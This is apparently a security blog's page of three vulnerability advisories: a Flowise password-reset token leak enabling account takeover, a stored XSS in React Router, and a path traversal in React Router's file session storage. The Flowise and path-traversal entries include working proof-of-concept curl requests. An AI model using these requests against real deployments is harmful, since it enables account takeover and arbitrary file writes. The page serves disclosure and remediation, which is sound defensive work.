CriticalAccount TakeoverCVE-2025-58434

Published September 4, 2025

Critical Flowise Account Takeover via Password Reset Token Disclosure

BugBunny.ai identified a vulnerability that leaks password-reset tokens for any Flowise Cloud or self-hosted user, enabling full account takeover with nothing more than an email address. Flowise—the no-code LLM orchestration platform with 43k+ GitHub stars and recently acquired by Workday—worked with us to remediate the issue ahead of public disclosure.

Responsibly DisclosedView CVE →

TL;DR

Account takeover across Flowise Cloud & local installs

  • Impact:Complete account takeover (ATO) with no authentication.
  • Root Cause:forgot-password API leaked live reset tokens.
  • Surface:Flowise Cloud (SaaS) and any self-hosted instance.
  • Status:Fixed in v3.0.6 with coordinated disclosure.

Summary

Flowise exposes a public password-reset endpoint at /api/v1/account/forgot-password. Instead of issuing a confirmation email, the API responded with a fully hydrated user object, including a valid password reset tempToken. An attacker only needed a target email address to request the token and immediately reset the victim's password via /api/v1/account/reset-password.

The bug affected both the hosted cloud environment and any community deployment that exposed these routes. Because Flowise often powers customer-facing automation, compromise of a single account could expose integrations, API keys, prompt libraries, and downstream systems.

Proof of Concept

The attack requires two requests. First, trigger the password reset flow for any email. The response contains the temporary token. Then, immediately reset the password using that token—no mailbox access, user confirmation, or prior authentication required.

curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

# Response excerpt (201 Created)
{
  "user": {
    "id": "<redacted-uuid>",
    "email": "<victim@example.com>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z"
  }
}
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Remediation Guidance

  • Send reset tokens exclusively through the registered email channel—never return them in API responses.
  • Harden forgot-password to respond generically and avoid user/email enumeration.
  • Scope tokens to a single request, enforce short expiries, and bind them to the requesting IP/device when feasible.
  • Mirror fixes in both cloud and on-premise deployments, and advise customers to upgrade to Flowise v3.0.6 or later.
  • Instrument logging for anomalous reset traffic; alert on bulk or repeated requests per account.
  • Consider MFA or stepped-up verification for administrative or high-value accounts.

Credits & Timeline

Vulnerability discovered by BugBunny.ai researchers and reported to Flowise under responsible disclosure. Flowise acknowledged the issue, issued patch v3.0.6, and coordinated CVE-2025-58434 alongside our team.

Reporter: @zaddy6Publication: GHSA-wgpv-6j63-x5ph
HighStored XSSCVE-2025-59057

Published September 10, 2025

Stored XSS in React Router Input Handling

React Router, the ubiquitous navigation library serving more than 90 million weekly downloads, is affected by a stored cross-site scripting issue under specific input handling conditions. Crafted payloads persisted in route state can execute automatically for downstream users.

Responsibly DisclosedView CVE →

TL;DR

Persistent script execution from crafted route data

Impact:Stored XSS leading to session hijack, credential theft, or unauthorized actions.
Vector:Untrusted route parameters injected into rendered outlets without sanitisation.
Surface:Applications persisting user-controlled values via loaders/actions across navigations.
Status:Fixed in React Router 7.1.2 with stricter escaping of route state.

Summary

When applications persisted user-controlled data in navigation state and later rendered that state via custom route loaders, React Router skipped escaping for HTML content. Attackers could craft payloads that stored <script> fragments in the router state, triggering execution for any user who later visited the poisoned route.

The vulnerability affects both classic data routers and the newer simplified APIs. Applications exposing public submission endpoints and reflecting values back through loaders/actions are at risk if unescaped values are rendered.

Mitigation

  • Upgrade to React Router 7.1.2 or later, or apply the upstream patch to earlier major versions.
  • Sanitize and encode any user-controlled data before rendering in route outlets or meta loaders.
  • Review custom navigation helpers that bypass built-in sanitisation.
  • Deploy a strict Content Security Policy (CSP) to reduce impact even if an injection lands.

Credits & Disclosure

Identified by the BugBunny.ai research team and reported privately to the React Router maintainers. The fix shipped within 12 days, with coordinated public disclosure on npm and GitHub.

Reporter: BugBunny.ai ResearchMaintainer Fix: React Router 7.1.2
HighPath TraversalCVE-2025-61686

Published October 2, 2025

React Router File Session Storage Path Traversal

BugBunny.ai identified that React Router's createFileSessionStoragetrusted session IDs when deriving file paths. Attackers who can influence the session identifier can escape the configured storage directory and overwrite arbitrary files on disk, from application configuration to deployment scripts. The issue impacts any server using the file session store—including Remix apps—and has now been patched and assigned CVE-2025-61686.

Responsibly DisclosedView CVE →

TL;DR

Directory escape via crafted session identifiers

Impact:Arbitrary file overwrite/read using attacker-controlled session IDs.
Vector:Path traversal in the session storage filename normalisation.
Surface:Node servers using createFileSessionStorage (Remix & React Router).
Status:Fixed in React Router 7.2.0 with strict path sanitisation.

Summary

Session files are stored on disk using the provided session ID as part of the filename. By inserting traversal sequences (e.g. ../../../../) an attacker can pivot out of the session directory and point the storage layer at arbitrary paths. On subsequent writes the framework will happily overwrite sensitive files, or allow the attacker to drop a malicious script that is executed on the next deploy.

Hosting providers using persistent volumes are especially exposed: a single malicious request can replace configuration, modify edge handlers, or poison build artefacts. Log inspection also becomes difficult because the session middleware reports a 200 OK response.

Proof of Concept

The following request uses a traversal sequence to escape the session directory and plant an arbitrary JSON file in /tmp. A second request can then read or overwrite other files in the same manner.

curl -i -X POST https://<target>/__session/../../../../tmp/owned.json \
  -H "Content-Type: application/json" \
  -d '{
        "id":"../../../../tmp/owned.json",
        "data":{"role":"admin","note":"BugBunny was here"}
      }'

# Result: arbitrary file created/overwritten outside the session directory.

Mitigation

  • Upgrade to React Router / Remix releases that patch CVE-2025-61686 (7.2.0+).
  • Reject or regenerate session IDs supplied by untrusted clients.
  • Run the application with a dedicated, permissions-restricted session directory.
  • Consider switching to cookie or database-backed session storage where feasible.

Credits & Disclosure

Reported privately to the React Router maintainers with a working exploit. A fix shipped within eight days, followed by a GitHub Security Advisory and npm deprecation notice for vulnerable releases.

Reporter: BugBunny.ai ResearchMaintainer Fix: React Router 7.2.0

Want coverage like this?

BugBunny continuously probes enterprise-grade agents to surface latent risks before attackers do. Launch an audit in minutes.

Start a Security AuditView Disclosure Policy
BugBunny Blog – Security Research | BugBunny.ai